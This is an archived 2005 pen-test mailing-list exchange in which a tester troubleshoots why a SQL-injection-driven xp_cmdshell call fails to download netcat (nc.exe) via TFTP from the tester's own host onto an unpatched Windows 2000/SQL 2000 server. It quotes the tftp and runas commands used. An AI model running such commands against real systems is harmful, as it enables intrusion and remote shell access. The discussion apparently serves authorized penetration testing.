Re: TFTP and XP_CMDSHELL - Weird

From: Andres Molinetti (andymolinetti@hotmail.com)
Date: Thu Jun 23 2005 - 09:38:06 EDT

• Next message: Andres Molinetti: "Re: TFTP and XP_CMDSHELL - Weird"
• Previous message: c.ehlen@bull.de: "Antwort: Sniffing Encrypted Traffic (w/ keys)"
• In reply to: Jose Selvi: "Re: TFTP and XP_CMDSHELL - Weird"
• Next in thread: Frederic Charpentier: "Re: TFTP and XP_CMDSHELL - Weird"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

>From: Jose Selvi <jselvi@s2grupo.com>
>To: Andres Molinetti <andymolinetti@hotmail.com>
>CC: pen-test@securityfocus.com
>Subject: Re: TFTP and XP_CMDSHELL - Weird
>Date: Thu, 23 Jun 2005 09:16:41 +0200
>
>Maybe sqlsvc user can't write in c:\ folder. Can He?.
>
>The first call to tftp you are using Administrator user, who of course can
>write in c:\ .
>
>Try "runas /user:sqlsvc tftp -i myHost GET nc.exe c:\winnt\temp\nc.exe".
>It must work.
>
It doesn't.
Besides, I have done "runas /user:sqlsvc echo a > c:\xx.exe" and the file is
created.
any ideas?

If it is any useful I recieve the following error on the Target machine:
"tftp: No se puede escribir en el archivo local 'c:\xx.exe'"
(tftp: Not able to write in local file 'c:\xx.exe')

In a tcpdump in my TFTP Server I get the following error:
10:41:37.528994 IP TARGET.1942 > SERVER.tftp: 48 ERROR EACCESS no se puede
abrir el archivo para escritura"
(cannot open file for writing)

I think its beyond xp_cmdshell now..

Thanks, Andy

>Andres Molinetti escribió:
>>Hi, I am testing a Web App vulnerable to SQL Injection.
>>It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.
>>
>>While trying to use the xp_cmdshell to upload nc.exe from my tftpd server
>>to the Webserver, I experienced some problems.
>>
>>I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.
>>
>>As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost GET
>>nc.exe c:\nc.exe". File is downloaded.
>>
>>When I tried it through the wep app it failed. I tried directly through
>>SQL Query Analizer and it also failed.
>>
>>SQL is running as a low priviledged account (sqlsvc)...
>>
>>Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET
>>nc.exe c:\nc.exe" and IT FAILED.!!
>>
>>I can easily deduce that the problem is the TFTP client (tftp.exe)...
>>
>>Any Ideas?

_________________________________________________________________
Descarga gratis la Barra de Herramientas de MSN
http://www.msn.es/usuario/busqueda/barra?XAPID=2031&DI=1055&SU=http%3A//www.hotmail.com&HL=LINKTAG1OPENINGTEXT_MSNBH

• Next message: Andres Molinetti: "Re: TFTP and XP_CMDSHELL - Weird"
• Previous message: c.ehlen@bull.de: "Antwort: Sniffing Encrypted Traffic (w/ keys)"
• In reply to: Jose Selvi: "Re: TFTP and XP_CMDSHELL - Weird"
• Next in thread: Frederic Charpentier: "Re: TFTP and XP_CMDSHELL - Weird"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:29 EDT